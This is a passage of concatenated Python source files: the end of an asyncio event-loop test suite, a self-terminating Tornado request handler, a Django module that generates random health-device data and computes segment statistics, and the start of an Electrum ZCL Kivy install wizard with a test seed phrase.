self.loop.run_until_complete(proto.completed)
self.assertEqual(7, proto.returncode)
def test_subprocess_exec_invalid_args(self):
async def connect(**kwds):
await self.loop.subprocess_exec(
asyncio.SubprocessProtocol,
'pwd', **kwds)
with self.assertRaises(ValueError):
self.loop.run_until_complete(connect(universal_newlines=True))
with self.assertRaises(ValueError):
self.loop.run_until_complete(connect(bufsize=4096))
with self.assertRaises(ValueError):
self.loop.run_until_complete(connect(shell=True))
def test_subprocess_shell_invalid_args(self):
async def connect(cmd=None, **kwds):
if not cmd:
cmd = 'pwd'
await self.loop.subprocess_shell(
asyncio.SubprocessProtocol,
cmd, **kwds)
with self.assertRaises(ValueError):
self.loop.run_until_complete(connect(['ls', '-l']))
with self.assertRaises(ValueError):
self.loop.run_until_complete(connect(universal_newlines=True))
with self.assertRaises(ValueError):
self.loop.run_until_complete(connect(bufsize=4096))
with self.assertRaises(ValueError):
self.loop.run_until_complete(connect(shell=False))
if sys.platform == 'win32':
class SelectEventLoopTests(EventLoopTestsMixin,
test_utils.TestCase):
def create_event_loop(self):
return asyncio.SelectorEventLoop()
class ProactorEventLoopTests(EventLoopTestsMixin,
SubprocessTestsMixin,
test_utils.TestCase):
def create_event_loop(self):
return asyncio.ProactorEventLoop()
def test_reader_callback(self):
raise unittest.SkipTest("IocpEventLoop does not have add_reader()")
def test_reader_callback_cancel(self):
raise unittest.SkipTest("IocpEventLoop does not have add_reader()")
def test_writer_callback(self):
raise unittest.SkipTest("IocpEventLoop does not have add_writer()")
def test_writer_callback_cancel(self):
raise unittest.SkipTest("IocpEventLoop does not have add_writer()")
def test_remove_fds_after_closing(self):
raise unittest.SkipTest("IocpEventLoop does not have add_reader()")
else:
import selectors
class UnixEventLoopTestsMixin(EventLoopTestsMixin):
def setUp(self):
super().setUp()
watcher = asyncio.SafeChildWatcher()
watcher.attach_loop(self.loop)
asyncio.set_child_watcher(watcher)
def tearDown(self):
asyncio.set_child_watcher(None)
super().tearDown()
if hasattr(selectors, 'KqueueSelector'):
class KqueueEventLoopTests(UnixEventLoopTestsMixin,
SubprocessTestsMixin,
test_utils.TestCase):
def create_event_loop(self):
return asyncio.SelectorEventLoop(
selectors.KqueueSelector())
# kqueue doesn't support character devices (PTY) on Mac OS X older
# than 10.9 (Maverick)
@support.requires_mac_ver(10, 9)
# Issue #20667: KqueueEventLoopTests.test_read_pty_output()
# hangs on OpenBSD 5.5
@unittest.skipIf(sys.platform.startswith('openbsd'),
'test hangs on OpenBSD')
def test_read_pty_output(self):
super().test_read_pty_output()
# kqueue doesn't support character devices (PTY) on Mac OS X older
# than 10.9 (Maverick)
@support.requires_mac_ver(10, 9)
def test_write_pty(self):
super().test_write_pty()
if hasattr(selectors, 'EpollSelector'):
class EPollEventLoopTests(UnixEventLoopTestsMixin,
SubprocessTestsMixin,
test_utils.TestCase):
def create_event_loop(self):
return asyncio.SelectorEventLoop(selectors.EpollSelector())
if hasattr(selectors, 'PollSelector'):
class PollEventLoopTests(UnixEventLoopTestsMixin,
SubprocessTestsMixin,
test_utils.TestCase):
def create_event_loop(self):
return asyncio.SelectorEventLoop(selectors.PollSelector())
# Should always exist.
class SelectEventLoopTests(UnixEventLoopTestsMixin,
SubprocessTestsMixin,
test_utils.TestCase):
def create_event_loop(self):
return asyncio.SelectorEventLoop(selectors.SelectSelector())
def noop(*args, **kwargs):
pass
class HandleTests(test_utils.TestCase):
def setUp(self):
super().setUp()
self.loop = mock.Mock()
self.loop.get_debug.return_value = True
def test_handle(self):
def callback(*args):
return args
args = ()
h = asyncio.Handle(callback, args, self.loop)
self.assertIs(h._callback, callback)
self.assertIs(h._args, args)
self.assertFalse(h.cancelled())
h.cancel()
self.assertTrue(h.cancelled())
def test_callback_with_exception(self):
def callback():
raise ValueError()
self.loop = mock.Mock()
self.loop.call_exception_handler = mock.Mock()
h = asyncio.Handle(callback, (), self.loop)
h._run()
self.loop.call_exception_handler.assert_called_with({
'message': test_utils.MockPattern('Exception in callback.*'),
'exception': mock.ANY,
'handle': h,
'source_traceback': h._source_traceback,
})
def test_handle_weakref(self):
wd = weakref.WeakValueDictionary()
h = asyncio.Handle(lambda: None, (), self.loop)
wd['h'] = h # Would fail without __weakref__ slot.
def test_handle_repr(self):
self.loop.get_debug.return_value = False
# simple function
h = asyncio.Handle(noop, (1, 2), self.loop)
filename, lineno = test_utils.get_function_source(noop)
self.assertEqual(repr(h),
'<Handle noop(1, 2) at %s:%s>'
% (filename, lineno))
# cancelled handle
h.cancel()
self.assertEqual(repr(h),
'<Handle cancelled>')
# decorated function
with self.assertWarns(DeprecationWarning):
cb = asyncio.coroutine(noop)
h = asyncio.Handle(cb, (), self.loop)
self.assertEqual(repr(h),
'<Handle noop() at %s:%s>'
% (filename, lineno))
# partial function
cb = functools.partial(noop, 1, 2)
h = asyncio.Handle(cb, (3,), self.loop)
regex = (r'^<Handle noop\(1, 2\)\(3\) at %s:%s>$'
% (re.escape(filename), lineno))
self.assertRegex(repr(h), regex)
# partial function with keyword args
cb = functools.partial(noop, x=1)
h = asyncio.Handle(cb, (2, 3), self.loop)
regex = (r'^<Handle noop\(x=1\)\(2, 3\) at %s:%s>$'
% (re.escape(filename), lineno))
self.assertRegex(repr(h), regex)
# partial method
if sys.version_info >= (3, 4):
method = HandleTests.test_handle_repr
cb = functools.partialmethod(method)
filename, lineno = test_utils.get_function_source(method)
h = asyncio.Handle(cb, (), self.loop)
cb_regex = r'<function HandleTests.test_handle_repr .*>'
cb_regex = (r'functools.partialmethod\(%s, , \)\(\)' % cb_regex)
regex = (r'^<Handle %s at %s:%s>$'
% (cb_regex, re.escape(filename), lineno))
self.assertRegex(repr(h), regex)
def test_handle_repr_debug(self):
self.loop.get_debug.return_value = True
# simple function
create_filename = __file__
create_lineno = sys._getframe().f_lineno + 1
h = asyncio.Handle(noop, (1, 2), self.loop)
filename, lineno = test_utils.get_function_source(noop)
self.assertEqual(repr(h),
'<Handle noop(1, 2) at %s:%s created at %s:%s>'
% (filename, lineno, create_filename, create_lineno))
# cancelled handle
h.cancel()
self.assertEqual(
repr(h),
'<Handle cancelled noop(1, 2) at %s:%s created at %s:%s>'
% (filename, lineno, create_filename, create_lineno))
# double cancellation won't overwrite _repr
h.cancel()
self.assertEqual(
repr(h),
'<Handle cancelled noop(1, 2) at %s:%s created at %s:%s>'
% (filename, lineno, create_filename, create_lineno))
def test_handle_source_traceback(self):
loop = asyncio.get_event_loop_policy().new_event_loop()
loop.set_debug(True)
self.set_event_loop(loop)
def check_source_traceback(h):
lineno = sys._getframe(1).f_lineno - 1
self.assertIsInstance(h._source_traceback, list)
self.assertEqual(h._source_traceback[-1][:3],
(__file__,
lineno,
'test_handle_source_traceback'))
# call_soon
h = loop.call_soon(noop)
check_source_traceback(h)
# call_soon_threadsafe
h = loop.call_soon_threadsafe(noop)
check_source_traceback(h)
# call_later
h = loop.call_later(0, noop)
check_source_traceback(h)
# call_at
h = loop.call_later(0, noop)
check_source_traceback(h)
@unittest.skipUnless(hasattr(collections.abc, 'Coroutine'),
'No collections.abc.Coroutine')
def test_coroutine_like_object_debug_formatting(self):
# Test that asyncio can format coroutines that are instances of
        # collections.abc.Coroutine, but lack cr_code or gi_code attributes
# (such as ones compiled with Cython).
coro = CoroLike()
coro.__name__ = 'AAA'
self.assertTrue(asyncio.iscoroutine(coro))
self.assertEqual(coroutines._format_coroutine(coro), 'AAA()')
coro.__qualname__ = 'BBB'
self.assertEqual(coroutines._format_coroutine(coro), 'BBB()')
coro.cr_running = True
self.assertEqual(coroutines._format_coroutine(coro), 'BBB() running')
coro.__name__ = coro.__qualname__ = None
self.assertEqual(coroutines._format_coroutine(coro),
'<CoroLike without __name__>() running')
coro = CoroLike()
coro.__qualname__ = 'CoroLike'
# Some coroutines might not have '__name__', such as
# built-in async_gen.asend().
self.assertEqual(coroutines._format_coroutine(coro), 'CoroLike()')
coro = CoroLike()
coro.__qualname__ = 'AAA'
coro.cr_code = None
self.assertEqual(coroutines._format_coroutine(coro), 'AAA()')
class TimerTests(unittest.TestCase):
def setUp(self):
super().setUp()
self.loop = mock.Mock()
def test_hash(self):
when = time.monotonic()
h = asyncio.TimerHandle(when, lambda: False, (),
mock.Mock())
self.assertEqual(hash(h), hash(when))
def test_when(self):
when = time.monotonic()
h = asyncio.TimerHandle(when, lambda: False, (),
mock.Mock())
self.assertEqual(when, h.when())
def test_timer(self):
def callback(*args):
return args
args = (1, 2, 3)
when = time.monotonic()
h = asyncio.TimerHandle(when, callback, args, mock.Mock())
self.assertIs(h._callback, callback)
self.assertIs(h._args, args)
self.assertFalse(h.cancelled())
# cancel
h.cancel()
self.assertTrue(h.cancelled())
self.assertIsNone(h._callback)
self.assertIsNone(h._args)
# when cannot be None
self.assertRaises(AssertionError,
asyncio.TimerHandle, None, callback, args,
self.loop)
def test_timer_repr(self):
self.loop.get_debug.return_value = False
# simple function
h = asyncio.TimerHandle(123, noop, (), self.loop)
src = test_utils.get_function_source(noop)
self.assertEqual(repr(h),
'<TimerHandle when=123 noop() at %s:%s>' % src)
# cancelled handle
h.cancel()
self.assertEqual(repr(h),
'<TimerHandle cancelled when=123>')
def test_timer_repr_debug(self):
self.loop.get_debug.return_value = True
# simple function
create_filename = __file__
create_lineno = sys._getframe().f_lineno + 1
h = asyncio.TimerHandle(123, noop, (), self.loop)
filename, lineno = test_utils.get_function_source(noop)
self.assertEqual(repr(h),
'<TimerHandle when=123 noop() '
'at %s:%s created at %s:%s>'
% (filename, lineno, create_filename, create_lineno))
# cancelled handle
h.cancel()
self.assertEqual(repr(h),
'<TimerHandle cancelled when=123 noop() '
'at %s:%s created at %s:%s>'
% (filename, lineno, create_filename, create_lineno))
def test_timer_comparison(self):
def callback(*args):
return args
when = time.monotonic()
h1 = asyncio.TimerHandle(when, callback, (), self.loop)
h2 = asyncio.TimerHandle(when, callback, (), self.loop)
# TODO: Use assertLess etc.
self.assertFalse(h1 < h2)
self.assertFalse(h2 < h1)
self.assertTrue(h1 <= h2)
self.assertTrue(h2 <= h1)
self.assertFalse(h1 > h2)
self.assertFalse(h2 > h1)
self.assertTrue(h1 >= h2)
self.assertTrue(h2 >= h1)
self.assertTrue(h1 == h2)
self.assertFalse(h1 != h2)
h2.cancel()
self.assertFalse(h1 == h2)
h1 = asyncio.TimerHandle(when, callback, (), self.loop)
h2 = asyncio.TimerHandle(when + 10.0, callback, (), self.loop)
self.assertTrue(h1 < h2)
self.assertFalse(h2 < h1)
self.assertTrue(h1 <= h2)
self.assertFalse(h2 <= h1)
self.assertFalse(h1 > h2)
self.assertTrue(h2 > h1)
self.assertFalse(h1 >= h2)
self.assertTrue(h2 >= h1)
self.assertFalse(h1 == h2)
self.assertTrue(h1 != h2)
h3 = asyncio.Handle(callback, (), self.loop)
self.assertIs(NotImplemented, h1.__eq__(h3))
self.assertIs(NotImplemented, h1.__ne__(h3))
with self.assertRaises(TypeError):
h1 < ()
with self.assertRaises(TypeError):
h1 > ()
with self.assertRaises(TypeError):
h1 <= ()
with self.assertRaises(TypeError):
h1 >= ()
self.assertFalse(h1 == ())
self.assertTrue(h1 != ())
self.assertTrue(h1 == ALWAYS_EQ)
self.assertFalse(h1 != ALWAYS_EQ)
self.assertTrue(h1 < LARGEST)
self.assertFalse(h1 > LARGEST)
self.assertTrue(h1 <= LARGEST)
self.assertFalse(h1 >= LARGEST)
self.assertFalse(h1 < SMALLEST)
self.assertTrue(h1 > SMALLEST)
self.assertFalse(h1 <= SMALLEST)
self.assertTrue(h1 >= SMALLEST)
class AbstractEventLoopTests(unittest.TestCase):
def test_not_implemented(self):
f = mock.Mock()
loop = asyncio.AbstractEventLoop()
self.assertRaises(
NotImplementedError, loop.run_forever)
self.assertRaises(
NotImplementedError, loop.run_until_complete, None)
self.assertRaises(
NotImplementedError, loop.stop)
self.assertRaises(
NotImplementedError, loop.is_running)
self.assertRaises(
NotImplementedError, loop.is_closed)
self.assertRaises(
NotImplementedError, loop.close)
self.assertRaises(
NotImplementedError, loop.create_task, None)
self.assertRaises(
NotImplementedError, loop.call_later, None, None)
self.assertRaises(
NotImplementedError, loop.call_at, f, f)
self.assertRaises(
NotImplementedError, loop.call_soon, None)
self.assertRaises(
NotImplementedError, loop.time)
self.assertRaises(
NotImplementedError, loop.call_soon_threadsafe, None)
self.assertRaises(
NotImplementedError, loop.set_default_executor, f)
self.assertRaises(
NotImplementedError, loop.add_reader, 1, f)
self.assertRaises(
NotImplementedError, loop.remove_reader, 1)
self.assertRaises(
NotImplementedError, loop.add_writer, 1, f)
self.assertRaises(
NotImplementedError, loop.remove_writer, 1)
self.assertRaises(
NotImplementedError, loop.add_signal_handler, 1, f)
self.assertRaises(
NotImplementedError, loop.remove_signal_handler, 1)
self.assertRaises(
NotImplementedError, loop.remove_signal_handler, 1)
self.assertRaises(
NotImplementedError, loop.set_exception_handler, f)
self.assertRaises(
NotImplementedError, loop.default_exception_handler, f)
self.assertRaises(
NotImplementedError, loop.call_exception_handler, f)
self.assertRaises(
NotImplementedError, loop.get_debug)
self.assertRaises(
NotImplementedError, loop.set_debug, f)
def test_not_implemented_async(self):
async def inner():
f = mock.Mock()
loop = asyncio.AbstractEventLoop()
with self.assertRaises(NotImplementedError):
await loop.run_in_executor(f, f)
with self.assertRaises(NotImplementedError):
await loop.getaddrinfo('localhost', 8080)
with self.assertRaises(NotImplementedError):
await loop.getnameinfo(('localhost', 8080))
with self.assertRaises(NotImplementedError):
await loop.create_connection(f)
with self.assertRaises(NotImplementedError):
await loop.create_server(f)
with self.assertRaises(NotImplementedError):
await loop.create_datagram_endpoint(f)
with self.assertRaises(NotImplementedError):
await loop.sock_recv(f, 10)
with self.assertRaises(NotImplementedError):
await loop.sock_recv_into(f, 10)
with self.assertRaises(NotImplementedError):
await loop.sock_sendall(f, 10)
with self.assertRaises(NotImplementedError):
await loop.sock_connect(f, f)
with self.assertRaises(NotImplementedError):
await loop.sock_accept(f)
with self.assertRaises(NotImplementedError):
await loop.sock_sendfile(f, f)
with self.assertRaises(NotImplementedError):
await loop.sendfile(f, f)
with self.assertRaises(NotImplementedError):
await loop.connect_read_pipe(f, mock.sentinel.pipe)
with self.assertRaises(NotImplementedError):
await loop.connect_write_pipe(f, mock.sentinel.pipe)
with self.assertRaises(NotImplementedError):
await loop.subprocess_shell(f, mock.sentinel)
with self.assertRaises(NotImplementedError):
await loop.subprocess_exec(f)
loop = asyncio.new_event_loop()
loop.run_until_complete(inner())
loop.close()
class PolicyTests(unittest.TestCase):
def test_event_loop_policy(self):
policy = asyncio.AbstractEventLoopPolicy()
self.assertRaises(NotImplementedError, policy.get_event_loop)
self.assertRaises(NotImplementedError, policy.set_event_loop, object())
self.assertRaises(NotImplementedError, policy.new_event_loop)
self.assertRaises(NotImplementedError, policy.get_child_watcher)
self.assertRaises(NotImplementedError, policy.set_child_watcher,
object())
def test_get_event_loop(self):
policy = asyncio.DefaultEventLoopPolicy()
self.assertIsNone(policy._local._loop)
loop = policy.get_event_loop()
self.assertIsInstance(loop, asyncio.AbstractEventLoop)
self.assertIs(policy._local._loop, loop)
self.assertIs(loop, policy.get_event_loop())
loop.close()
def test_get_event_loop_calls_set_event_loop(self):
policy = asyncio.DefaultEventLoopPolicy()
with mock.patch.object(
policy, "set_event_loop",
wraps=policy.set_event_loop) as m_set_event_loop:
loop = policy.get_event_loop()
# policy._local._loop must be set through .set_event_loop()
# (the unix DefaultEventLoopPolicy needs this call to attach
# the child watcher correctly)
m_set_event_loop.assert_called_with(loop)
loop.close()
def test_get_event_loop_after_set_none(self):
policy = asyncio.DefaultEventLoopPolicy()
policy.set_event_loop(None)
self.assertRaises(RuntimeError, policy.get_event_loop)
@mock.patch('asyncio.events.threading.current_thread')
def test_get_event_loop_thread(self, m_current_thread):
def f():
policy = asyncio.DefaultEventLoopPolicy()
self.assertRaises(RuntimeError, policy.get_event_loop)
th = threading.Thread(target=f)
th.start()
th.join()
def test_new_event_loop(self):
policy = asyncio.DefaultEventLoopPolicy()
loop = policy.new_event_loop()
self.assertIsInstance(loop, asyncio.AbstractEventLoop)
loop.close()
def test_set_event_loop(self):
policy = asyncio.DefaultEventLoopPolicy()
old_loop = policy.get_event_loop()
self.assertRaises(AssertionError, policy.set_event_loop, object())
loop = policy.new_event_loop()
policy.set_event_loop(loop)
self.assertIs(loop, policy.get_event_loop())
self.assertIsNot(old_loop, policy.get_event_loop())
loop.close()
old_loop.close()
def test_get_event_loop_policy(self):
policy = asyncio.get_event_loop_policy()
self.assertIsInstance(policy, asyncio.AbstractEventLoopPolicy)
self.assertIs(policy, asyncio.get_event_loop_policy())
def test_set_event_loop_policy(self):
self.assertRaises(
AssertionError, asyncio.set_event_loop_policy, object())
old_policy = asyncio.get_event_loop_policy()
policy = asyncio.DefaultEventLoopPolicy()
asyncio.set_event_loop_policy(policy)
self.assertIs(policy, asyncio.get_event_loop_policy())
self.assertIsNot(policy, old_policy)
class GetEventLoopTestsMixin:
_get_running_loop_impl = None
_set_running_loop_impl = None
get_running_loop_impl = None
get_event_loop_impl = None
def setUp(self):
self._get_running_loop_saved = events._get_running_loop
self._set_running_loop_saved = events._set_running_loop
self.get_running_loop_saved = events.get_running_loop
self.get_event_loop_saved = events.get_event_loop
events._get_running_loop = type(self)._get_running_loop_impl
events._set_running_loop = type(self)._set_running_loop_impl
events.get_running_loop = type(self).get_running_loop_impl
events.get_event_loop = type(self).get_event_loop_impl
asyncio._get_running_loop = type(self)._get_running_loop_impl
asyncio._set_running_loop = type(self)._set_running_loop_impl
asyncio.get_running_loop = type(self).get_running_loop_impl
asyncio.get_event_loop = type(self).get_event_loop_impl
super().setUp()
self.loop = asyncio.new_event_loop()
asyncio.set_event_loop(self.loop)
if sys.platform != 'win32':
watcher = asyncio.SafeChildWatcher()
watcher.attach_loop(self.loop)
asyncio.set_child_watcher(watcher)
def tearDown(self):
try:
if sys.platform != 'win32':
asyncio.set_child_watcher(None)
super().tearDown()
finally:
self.loop.close()
asyncio.set_event_loop(None)
events._get_running_loop = self._get_running_loop_saved
events._set_running_loop = self._set_running_loop_saved
events.get_running_loop = self.get_running_loop_saved
events.get_event_loop = self.get_event_loop_saved
asyncio._get_running_loop = self._get_running_loop_saved
asyncio._set_running_loop = self._set_running_loop_saved
asyncio.get_running_loop = self.get_running_loop_saved
asyncio.get_event_loop = self.get_event_loop_saved
if sys.platform != 'win32':
def test_get_event_loop_new_process(self):
# Issue bpo-32126: The multiprocessing module used by
# ProcessPoolExecutor is not functional when the
# multiprocessing.synchronize module cannot be imported.
support.import_module('multiprocessing.synchronize')
async def main():
pool = concurrent.futures.ProcessPoolExecutor()
result = await self.loop.run_in_executor(
pool, _test_get_event_loop_new_process__sub_proc)
pool.shutdown()
return result
self.assertEqual(
self.loop.run_until_complete(main()),
'hello')
def test_get_event_loop_returns_running_loop(self):
class TestError(Exception):
pass
class Policy(asyncio.DefaultEventLoopPolicy):
def get_event_loop(self):
raise TestError
old_policy = asyncio.get_event_loop_policy()
try:
asyncio.set_event_loop_policy(Policy())
loop = asyncio.new_event_loop()
with self.assertRaises(TestError):
asyncio.get_event_loop()
asyncio.set_event_loop(None)
with self.assertRaises(TestError):
asyncio.get_event_loop()
with self.assertRaisesRegex(RuntimeError, 'no running'):
self.assertIs(asyncio.get_running_loop(), None)
self.assertIs(asyncio._get_running_loop(), None)
async def func():
self.assertIs(asyncio.get_event_loop(), loop)
self.assertIs(asyncio.get_running_loop(), loop)
self.assertIs(asyncio._get_running_loop(), loop)
loop.run_until_complete(func())
asyncio.set_event_loop(loop)
with self.assertRaises(TestError):
asyncio.get_event_loop()
asyncio.set_event_loop(None)
with self.assertRaises(TestError):
asyncio.get_event_loop()
finally:
asyncio.set_event_loop_policy(old_policy)
if loop is not None:
loop.close()
with self.assertRaisesRegex(RuntimeError, 'no running'):
self.assertIs(asyncio.get_running_loop(), None)
self.assertIs(asyncio._get_running_loop(), None)
class TestPyGetEventLoop(GetEventLoopTestsMixin, unittest.TestCase):
_get_running_loop_impl = events._py__get_running_loop
_set_running_loop_impl = events._py__set_running_loop
get_running_loop_impl = events._py_get_running_loop
get_event_loop_impl = events._py_get_event_loop
try:
import _asyncio # NoQA
except ImportError:
pass
else:
class TestCGetEventLoop(GetEventLoopTestsMixin, unittest.TestCase):
_get_running_loop_impl = events._c__get_running_loop
_set_running_loop_impl = events._c__set_running_loop
get_running_loop_impl = events._c_get_running_loop
get_event_loop_impl = events._c_get_event_loop
class TestServer(unittest.TestCase):
def test_get_loop(self):
loop = asyncio.new_event_loop()
self.addCleanup(loop.close)
proto = MyProto(loop)
server = loop.run_until_complete(loop.create_server(lambda: proto, '0.0.0.0', 0))
self.assertEqual(server.get_loop(), loop)
server.close()
loop.run_until_complete(server.wait_closed())
class TestAbstractServer(unittest.TestCase):
def test_close(self):
with self.assertRaises(NotImplementedError):
events.AbstractServer().close()
def test_wait_closed(self):
loop = asyncio.new_event_loop()
self.addCleanup(loop.close)
with self.assertRaises(NotImplementedError):
loop.run_until_complete(events.AbstractServer().wait_closed())
def test_get_loop(self):
with self.assertRaises(NotImplementedError):
events.AbstractServer().get_loop()
if __name__ == '__main__':
unittest.main()
|
tornado_handler.py
|
from __future__ import print_function
from ResponseProvider import Payload
from ResponseProvider import ResponseProvider
from ResponseProvider import ResponseProviderMixin
from threading import Timer
import os
import threading
import tornado.ioloop
import tornado.web
import logging
class MainHandler(tornado.web.RequestHandler, ResponseProviderMixin):
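    """Catch-all request handler for this self-terminating HTTP server.
    It keeps a client reference count (``ping_count``) plus a self-destruct
    timer: the IOLoop is stopped either when kill() drops the count to zero
    or when ``lifespan`` seconds elapse without a request resetting the timer.
    """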
ping_count = 1
self_destruct_timer = None
def got_pinged(self):
MainHandler.ping_count += 1
def kill(self):
MainHandler.ping_count -= 1
        if MainHandler.ping_count <= 0:  # '<= 0' so that concurrent decrements from several threads still shut the server down
MainHandler.suicide()
if MainHandler.self_destruct_timer:
MainHandler.self_destruct_timer.cancel()
def dispatch_response(self, payload):
self.set_status(payload.response_code())
for h in payload.headers():
self.add_header(h, payload.headers()[h])
self.add_header("Content-Length", payload.length())
self.write(payload.message())
def prepare_headers(self):
ret = dict()
for h in self.request.headers:
ret[h.lower()] = self.request.headers.get(h)
return ret
def init_vars(self):
self.response_provider = ResponseProvider(self)
self.headers = self.prepare_headers()
def prepare(self):
MainHandler.reset_self_destruct_timer()
self.init_vars()
def get(self, param):
self.dispatch_response(self.response_provider.response_for_url_and_headers(self.request.uri, self.headers))
def post(self, param):
payload = self.response_provider.response_for_url_and_headers(self.request.uri, self.headers)
if payload.response_code() >= 300:
self.dispatch_response(Payload(self.request.body))
else:
self.dispatch_response(payload)
@staticmethod
def suicide():
tornado.ioloop.IOLoop.current().stop()
logging.info("The server's life has come to an end, pid: {}".format(os.getpid()))
@staticmethod
def reset_self_destruct_timer():
if MainHandler.self_destruct_timer:
logging.debug("Canceling the kill timer")
MainHandler.self_destruct_timer.cancel()
MainHandler.self_destruct_timer = Timer(MainHandler.lifespan, MainHandler.suicide)
logging.debug("Starting the kill timer")
MainHandler.self_destruct_timer.start()
@staticmethod
def start_serving():
thread = threading.Thread(target=tornado.ioloop.IOLoop.current().start)
        thread.daemon = True
thread.start()
@staticmethod
def init_server(port, lifespan):
MainHandler.lifespan = lifespan
MainHandler.reset_self_destruct_timer()
application = tornado.web.Application([
(r"/(.*)", MainHandler),
])
application.listen(port)
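# Illustrative usage sketch (not part of the original module): the port and
# lifespan values below are arbitrary assumptions. A caller would normally
# configure the handler and then run the IOLoop until the self-destruct
# timer (or a final kill()) stops it.
if __name__ == '__main__':
    logging.basicConfig(level=logging.DEBUG)
    MainHandler.init_server(8080, 180.0)
    tornado.ioloop.IOLoop.current().start()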
|
generate_data.py
|
import logging
import os
import random
import time
import threading
from activity.constants import ACTIVITY, HEART_RATE, RESPIRATION_RATE, USER_ID
from activity.models import DeviceModel
from activity.utils import generate_csv_file, readable_time
import arrow
from django.conf import settings
from django.db.models import Avg, Max, Min
logging.basicConfig(
level=logging.INFO,
filename=os.path.join(settings.LOG_DIR) + '/activity.log',
format='%(asctime)s - [%(levelname)s] - %(app)s - %(name)s - (%(filename)s).%(funcName)s(%(lineno)d) - %(message)s',
)
logger = logging.getLogger(__name__)
logger = logging.LoggerAdapter(logger, {'app': 'Activity'})
class DeviceData:
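    """Generate random device readings and compute per-user heart-rate and
    respiration-rate statistics (overall, 15-minute and hourly segments)."""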
def __init__(self):
self.user_qs = DeviceModel.objects.values_list('user_id', flat=True).distinct()
def generate_data(self):
data = {
'user_id': random.choice(USER_ID),
'heart_rate': random.choice(HEART_RATE),
'respiration_rate': random.choice(RESPIRATION_RATE),
'activity': random.choice(ACTIVITY)
}
return data
def insert_to_db(self, limit):
"""
        Generate random data and insert it into the database.
"""
try:
for i in range(limit):
data = self.generate_data()
DeviceModel.objects.create(**data)
time.sleep(1)
except Exception as e:
logger.error('Exception-{}'.format(e))
def process_data(self, limit):
"""generation and insertion of data asynchronously"""
threading.Thread(target=self.insert_to_db, args=(limit,)).start()
return True, {'message': 'Data Generation in process'}
def aggregate_value(self, file_path):
"""
        Calculate avg, min and max over the entire data set for each user.
"""
try:
result = []
for user in [*self.user_qs]:
logger.info('user - {}'.format(user))
queryset = DeviceModel.objects.filter(user_id=user).aggregate(
Avg('heart_rate'), Max('heart_rate'), Min('heart_rate'),
Avg('respiration_rate'), Max('respiration_rate'),
Min('respiration_rate'), Min('timestamp'), Max('timestamp')
)
data = self.format_data(user, queryset)
result.append(data)
generate_csv_file(file_path, result)
return True
except Exception as e:
logger.error('Exception-{}'.format(e))
return False
def format_data(self, user, queryset):
"""
formatting data before writing it into csv
"""
data = {
'start_time': readable_time(queryset.get('timestamp__min')),
'end_time': readable_time(queryset.get('timestamp__max')),
'user_id': user,
'avg_hr': queryset.get('heart_rate__avg'),
'max_hr': queryset.get('heart_rate__max'),
'min_hr': queryset.get('heart_rate__min'),
'avg_rr': queryset.get('respiration_rate__avg'),
'max_rr': queryset.get('respiration_rate__max'),
'min_rr': queryset.get('respiration_rate__min')
}
return data
def segment_value(self, file_path):
"""
        Calculate avg, min and max for each user over the entire data set,
        in 15-minute segments.
"""
try:
seg_list = []
device_objs = DeviceModel.objects.all()
for user in [*self.user_qs]:
logger.info('user - {}'.format(user))
min_ts = device_objs.aggregate(Min('timestamp'))
from_seg = arrow.get(min_ts.get('timestamp__min'))
to_seg = from_seg.shift(minutes=15)
while True:
data = self.calculate_segment(user, device_objs, from_seg, to_seg)
seg_list.append(data)
if device_objs.filter(timestamp__gte=to_seg.timestamp):
from_seg = to_seg
to_seg = from_seg.shift(minutes=15)
else:
break
generate_csv_file(file_path, seg_list)
return True
except Exception as e:
logger.error('Exception-{}'.format(e))
return False
def calculate_segment(self, user, objs, from_seg, to_seg):
"""
        Common helper for the per-segment aggregation query.
"""
queryset = objs.filter(
user_id=user,
timestamp__range=[from_seg.datetime, to_seg.datetime]
).aggregate(Avg('heart_rate'), Max('heart_rate'),
Min('heart_rate'), Avg('respiration_rate'),
Max('respiration_rate'), Min('respiration_rate'),
Min('timestamp'), Max('timestamp'))
data = self.format_data(user, queryset)
data['start_time'] = from_seg.format('YYYY-MM-DD HH:mm:ss')
data['end_time'] = to_seg.format('YYYY-MM-DD HH:mm:ss')
return data
def range_segment(self, file_path, timestamp, timezone):
"""
        Calculate avg, min and max for each user over a one-hour window, in
        15-minute segments, after converting the given UTC timestamp to the
        requested timezone.
"""
try:
seg_list = []
for user in [*self.user_qs]:
logger.info('user - {}'.format(user))
from_ts = timestamp.to(timezone)
to_ts = from_ts.shift(minutes=60)
device_objs = DeviceModel.objects.filter(
user_id=user,
timestamp__range=[from_ts.datetime, to_ts.datetime]
)
cur_ts = from_ts.shift(minutes=15)
while True:
data = self.calculate_segment(user, device_objs, from_ts, cur_ts)
seg_list.append(data)
if cur_ts == to_ts:
break
from_ts = cur_ts
cur_ts = from_ts.shift(minutes=15)
generate_csv_file(file_path, seg_list)
return True
except Exception as e:
logger.error('Exception-{}'.format(e))
return False
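# Illustrative usage sketch (not part of the original module; the limit and
# file paths are arbitrary assumptions). From a Django view or management
# command one would typically do:
#
#     device_data = DeviceData()
#     device_data.process_data(100)                      # background inserts
#     device_data.aggregate_value('/tmp/aggregate.csv')  # overall per-user stats
#     device_data.segment_value('/tmp/segments.csv')     # 15-minute segment stats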
|
installwizard.py
|
from functools import partial
import threading
from kivy.app import App
from kivy.clock import Clock
from kivy.lang import Builder
from kivy.properties import ObjectProperty, StringProperty, OptionProperty
from kivy.core.window import Window
from kivy.uix.button import Button
from kivy.utils import platform
from kivy.uix.widget import Widget
from electrum_zcl_gui.kivy.uix.dialogs import EventsDialog
from electrum_zcl_gui.kivy.i18n import _
from electrum_zcl.base_wizard import BaseWizard
from password_dialog import PasswordDialog
# global Variables
app = App.get_running_app()
is_test = (platform == "linux")
test_seed = "time taxi field recycle tiny license olive virus report rare steel portion achieve"
test_xpub = "xpub661MyMwAqRbcEbvVtRRSjqxVnaWVUMewVzMiURAKyYratih4TtBpMypzzefmv8zUNebmNVzB3PojdC5sV2P9bDgMoo9B3SARw1MXUUfU1GL"
Builder.load_string('''
#:import Window kivy.core.window.Window
#:import _ electrum_zcl_gui.kivy.i18n._
<WizardTextInput@TextInput>
border: 4, 4, 4, 4
font_size: '15sp'
padding: '15dp', '15dp'
background_color: (1, 1, 1, 1) if self.focus else (0.454, 0.698, 0.909, 1)
foreground_color: (0.31, 0.31, 0.31, 1) if self.focus else (0.835, 0.909, 0.972, 1)
hint_text_color: self.foreground_color
background_active: 'atlas://gui/kivy/theming/light/create_act_text_active'
background_normal: 'atlas://gui/kivy/theming/light/create_act_text_active'
size_hint_y: None
height: '48sp'
